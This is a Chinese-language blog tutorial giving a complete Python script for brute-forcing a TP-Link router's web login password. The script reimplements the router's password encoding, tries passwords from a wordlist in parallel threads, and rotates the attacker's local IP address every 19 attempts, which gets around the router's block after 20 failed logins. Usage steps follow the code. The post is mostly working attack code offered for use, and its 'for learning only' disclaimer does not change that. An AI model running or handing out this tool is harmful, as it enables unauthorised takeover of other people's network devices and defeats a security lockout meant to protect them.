TPLINK设备是日常生活中最常见的网络设备。有时候我们需要恢复路由器的登录密码。往往是采用爆破的形式。想着利用神器Burp直接暴力破解,通过抓包一脸懵逼~
注:本文仅供学习,坚决反对一切危害网络安全的行为。造成法律后果自行负责!
先按照以往思路,抓包查看请求。
不难看到,数据是加密了。
代码语言:javascript复制{"method":"do","login":{"password":"0wL8rbhc9TefbwK"}}
其中的加密方法
查阅了这位大佬的博客:https://blog.csdn.net/oMaFei/article/details/94592388 通过Python实现了模拟登录。当返回error_code为0表示登录成功。
✈️解决IP被封
TPKINK等登录IP做了限制,错误20次后,自动封锁此IP。因此,我们我们需要不断更换IP地址。为了使破解顺利,我对一个IP只用19次,用完后,立马切换IP地址。
代码语言:javascript复制sudo ip addr del 192.168.0.109/24 dev eth0 #删除IP
sudo ip addr add 192.168.0.100/24 dev eth0 #添加IP
📧完整代码
代码语言:javascript复制#!/usr/bin/env python
# -*- coding:utf8 -*-
import requests
import json
import random
import time
from concurrent.futures import ThreadPoolExecutor
import sys
import subprocess
import re
import logging
import os
from functools import partial
# 配置日志
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class NetworkManager:
def __init__(self, interface='eth0', gateway='192.168.0.1'):
self.interface = interface
self.gateway = gateway
self.used_ips = set()
self.current_ip_attempts = 0# 当前IP的尝试次数
self.max_attempts_per_ip = 19# 每个IP最多尝试次数
def get_current_ip(self):
"""获取当前IP地址"""
try:
result = subprocess.run(['ip', 'addr', 'show', self.interface],
capture_output=True, text=True)
ip_match = re.search(r'inet (\d+\.\d+\.\d+\.\d+)', result.stdout)
if ip_match:
return ip_match.group(1)
returnNone
except Exception as e:
logger.error(f"获取当前IP失败: {str(e)}")
returnNone
def generate_new_ip(self):
"""生成新的IP地址"""
whileTrue:
new_ip = f"192.168.0.{random.randint(2, 254)}"
if new_ip notin self.used_ips:
self.used_ips.add(new_ip)
return new_ip
def change_ip(self):
"""修改IP地址"""
new_ip = self.generate_new_ip()
logger.info(f"正在尝试切换到新IP: {new_ip}")
try:
current_ip = self.get_current_ip()
if current_ip:
# 删除当前IP
logger.info(f"删除当前IP {current_ip}...")
subprocess.run(['ip', 'addr', 'del', f"{current_ip}/24", 'dev', self.interface],
check=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# 添加新IP
logger.info("正在添加新IP地址...")
subprocess.run(['ip', 'addr', 'add', f"{new_ip}/24", 'dev', self.interface],
check=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
# 等待网络连接生效
logger.info("等待网络连接生效...")
time.sleep(2)
# 验证IP是否更改成功
current_ip = self.get_current_ip()
if current_ip == new_ip:
logger.info(f"IP已成功更改为: {new_ip}")
self.current_ip_attempts = 0# 重置尝试次数
returnTrue
else:
logger.error(f"IP更改失败,当前IP: {current_ip}")
returnFalse
except subprocess.CalledProcessError as e:
logger.error(f"修改IP失败: {e.stderr.decode().strip()}")
returnFalse
except Exception as e:
logger.error(f"修改IP失败: {str(e)}")
returnFalse
def should_change_ip(self):
"""检查是否需要切换IP"""
self.current_ip_attempts += 1
if self.current_ip_attempts >= self.max_attempts_per_ip:
logger.info(f"当前IP已使用{self.current_ip_attempts}次,准备切换...")
returnTrue
returnFalse
class LoginTpLink(object):
def __init__(self, network_manager):
self.stok = None
self.success = False
self.password = None
self.network_manager = network_manager
self.failed_attempts = 0
self.max_failed_attempts = 15# 在达到20次之前就切换IP
def is_ip_blocked(self, response):
"""检查IP是否被封"""
try:
result = json.loads(response.text)
if'error_code'in result and result['error_code'] == -1:
returnTrue
returnFalse
except:
returnFalse
def login(self, password):
encryptPwd = self.encrypt_pwd(password)
url = 'http://192.168.0.1/'
headers = {
'Content-Type': 'application/json; charset=UTF-8'
}
payload = '{"method":"do","login":{"password":"%s"}}' % encryptPwd
try:
if self.network_manager.should_change_ip():
logger.info("当前IP使用次数已达上限,切换IP...")
ifnot self.network_manager.change_ip():
logger.error("IP切换失败,等待60秒后重试...")
time.sleep(60)
returnFalse
self.failed_attempts = 0
return self.login(password) # 使用新IP重试
response = requests.post(url, data=payload, headers=headers, timeout=5)
if self.is_ip_blocked(response):
logger.warning("检测到IP被封,正在切换IP...")
ifnot self.network_manager.change_ip():
logger.error("IP切换失败,等待60秒后重试...")
time.sleep(60)
returnFalse
self.failed_attempts = 0
return self.login(password) # 使用新IP重试
result = json.loads(response.text)
if result.get('error_code') == 0:
self.success = True
self.password = password
self.stok = result.get('stok')
returnTrue
self.failed_attempts += 1
if self.failed_attempts >= self.max_failed_attempts:
logger.warning(f"失败次数达到{self.max_failed_attempts}次,切换IP...")
ifnot self.network_manager.change_ip():
logger.error("IP切换失败,等待60秒后重试...")
time.sleep(60)
returnFalse
self.failed_attempts = 0
return self.login(password) # 使用新IP重试
returnFalse
except Exception as e:
logger.error(f"尝试密码 {password} 时发生错误: {str(e)}")
returnFalse
def encrypt_pwd(self, password):
input1 = "RDpbLfCPsJZ7fiv"
input3 = "yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW"
len1 = len(input1)
len2 = len(password)
dictionary = input3
lenDict = len(dictionary)
output = ''
if len1 > len2:
length = len1
else:
length = len2
index = 0
while index < length:
cl = 187
cr = 187
if index >= len1:
cr = ord(password[index])
elif index >= len2:
cl = ord(input1[index])
else:
cl = ord(input1[index])
cr = ord(password[index])
index += 1
output = output + chr(ord(dictionary[cl ^ cr]) % lenDict)
return output
def try_password(password, network_manager):
login_tp_link = LoginTpLink(network_manager)
if login_tp_link.login(password):
logger.info(f"\n[+] 成功找到密码: {password}")
return password
returnNone
def main():
if len(sys.argv) != 2:
print("使用方法: sudo python 11.py <密码字典文件路径>")
sys.exit(1)
password_file = sys.argv[1]
try:
with open(password_file, 'r', encoding='utf-8') as f:
passwords = [line.strip() for line in f if line.strip()]
except Exception as e:
logger.error(f"读取密码字典文件时发生错误: {str(e)}")
sys.exit(1)
logger.info(f"[*] 已加载 {len(passwords)} 个密码")
network_manager = NetworkManager(interface='eth0') # 根据实际情况修改接口名称
logger.info("开始切换初始IP...")
ifnot network_manager.change_ip():
logger.error("初始IP切换失败,退出程序")
sys.exit(1)
logger.info("[*] 开始尝试破解...")
with ThreadPoolExecutor(max_workers=3) as executor:
func = partial(try_password, network_manager=network_manager)
results = list(executor.map(func, passwords))
success_passwords = [p for p in results if p isnotNone]
if success_passwords:
logger.info(f"\n[+] 破解成功!找到 {len(success_passwords)} 个有效密码:")
for pwd in success_passwords:
logger.info(f" - {pwd}")
else:
logger.info("\n[-] 未找到有效密码")
if __name__ == '__main__':
main()
☢️使用方法
代码语言:javascript复制python3 11.py pass.txt #pass.txt为你的字典
注意,修改代码中,路由器的网关192.168.0.1根据你的实际进行修改。